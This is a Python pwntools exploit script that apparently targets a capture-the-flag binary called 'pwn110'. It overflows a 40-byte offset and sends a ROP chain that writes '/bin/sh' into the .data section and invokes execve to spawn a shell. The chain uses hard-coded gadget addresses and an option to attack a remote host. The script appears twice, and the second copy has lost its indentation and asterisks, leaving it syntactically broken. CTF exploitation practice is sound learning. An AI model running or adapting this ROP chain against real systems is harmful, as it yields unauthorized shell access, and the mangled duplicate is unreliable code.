DanaEpp/exploit110.py

## exploit110.py
#!/bin/env python3

import sys
from pwn import *

exe = "./pwn110.pwn110"
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'

def start(argv=[], *a, **kw):
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:
        return process([exe] + argv, *a, **kw)


# Specific your GDB script here for debugging
gdbscript = '''
continue
'''.format(**locals())

offset = 32 + 8 # Adjust for buffer + RBP

log.info( "Building ROP chain..." )
rop = ROP(elf)

data_section   = elf.get_section_by_name('.data').header.sh_addr
write_gadget   = 0x47bcf5   # mov qword ptr [rsi], rax; ret // Write-What-Where gadget
xor_rax_gadget = 0x443e30   # xor rax, rax; ret
add_rax_gadget = 0x470d20   # add rax, 1; ret
syscall = rop.find_gadget(['syscall']).address # We want a syscall gadget WITHOUT the ret

#  ----------------------------------------------------
# |   syscall  |  %rax |    %rdi   |   %rsi  |   %rdx  |
#  ----------------------------------------------------
# | SYS_execve |   59  | *filename | *argv[] | *envp[] |
#  ----------------------------------------------------
rop.raw(rop.rsi.address)    # pop rsi; ret
rop.raw(data_section)       # @ .data
rop.raw(rop.rax.address)    # pop rax; ret
rop.raw( b'/bin/sh\x00' )   # We make sure the data is properly 8 byte aligned
rop.raw(write_gadget)       # mov qword ptr [rsi], rax ; ret // Write-What-Where gadget
rop.raw(rop.rsi.address)    # pop rsi; ret
rop.raw(data_section + 8)   # @ .data + 8
rop.raw(xor_rax_gadget)     # xor rax, rax ; ret
rop.raw(write_gadget)       # mov qword ptr [rsi], rax ; ret // Write-What-Where gadget
rop.raw(rop.rdi.address)    # pop rdi; ret
rop.raw(data_section)       # @ .data
rop.raw(rop.rsi.address)    # pop rsi; ret
rop.raw(data_section + 8)   # @ .data + 8
rop.raw(rop.rdx.address)    # pop rdx; ret
rop.raw(data_section + 8)   # @ .data + 8
rop.raw(xor_rax_gadget)     # xor rax, rax ; ret

for i in range(0, constants.SYS_execve):
    rop.raw(add_rax_gadget) # add rax, 1; ret

rop.raw(syscall)

log.info( "Starting exploit run..." )
p = start()

log.info( "Sending payload..." )
p.sendlineafter( b"without libc \xf0\x9f\x98\x8f", fit({offset:rop.chain()}) )

p.clean()
p.interactive()
	#!/bin/env python3

	import sys
	from pwn import *

	exe = "./pwn110.pwn110"
	elf = context.binary = ELF(exe, checksec=False)
	context.log_level = 'info'

	def start(argv=[], a, *kw):
	if args.GDB:
	return gdb.debug([exe] + argv, gdbscript=gdbscript, a, *kw)
	elif args.REMOTE:
	return remote(sys.argv[1], sys.argv[2], a, *kw)
	else:
	return process([exe] + argv, a, *kw)


	# Specific your GDB script here for debugging
	gdbscript = '''
	continue
	'''.format(**locals())

	offset = 32 + 8 # Adjust for buffer + RBP

	log.info( "Building ROP chain..." )
	rop = ROP(elf)

	data_section = elf.get_section_by_name('.data').header.sh_addr
	write_gadget = 0x47bcf5 # mov qword ptr [rsi], rax; ret // Write-What-Where gadget
	xor_rax_gadget = 0x443e30 # xor rax, rax; ret
	add_rax_gadget = 0x470d20 # add rax, 1; ret
	syscall = rop.find_gadget(['syscall']).address # We want a syscall gadget WITHOUT the ret

	# ----------------------------------------------------
	# \| syscall \| %rax \| %rdi \| %rsi \| %rdx \|
	# ----------------------------------------------------
	# \| SYS_execve \| 59 \| filename \| argv[] \| *envp[] \|
	# ----------------------------------------------------
	rop.raw(rop.rsi.address) # pop rsi; ret
	rop.raw(data_section) # @ .data
	rop.raw(rop.rax.address) # pop rax; ret
	rop.raw( b'/bin/sh\x00' ) # We make sure the data is properly 8 byte aligned
	rop.raw(write_gadget) # mov qword ptr [rsi], rax ; ret // Write-What-Where gadget
	rop.raw(rop.rsi.address) # pop rsi; ret
	rop.raw(data_section + 8) # @ .data + 8
	rop.raw(xor_rax_gadget) # xor rax, rax ; ret
	rop.raw(write_gadget) # mov qword ptr [rsi], rax ; ret // Write-What-Where gadget
	rop.raw(rop.rdi.address) # pop rdi; ret
	rop.raw(data_section) # @ .data
	rop.raw(rop.rsi.address) # pop rsi; ret
	rop.raw(data_section + 8) # @ .data + 8
	rop.raw(rop.rdx.address) # pop rdx; ret
	rop.raw(data_section + 8) # @ .data + 8
	rop.raw(xor_rax_gadget) # xor rax, rax ; ret

	for i in range(0, constants.SYS_execve):
	rop.raw(add_rax_gadget) # add rax, 1; ret

	rop.raw(syscall)

	log.info( "Starting exploit run..." )
	p = start()

	log.info( "Sending payload..." )
	p.sendlineafter( b"without libc \xf0\x9f\x98\x8f", fit({offset:rop.chain()}) )

	p.clean()
	p.interactive()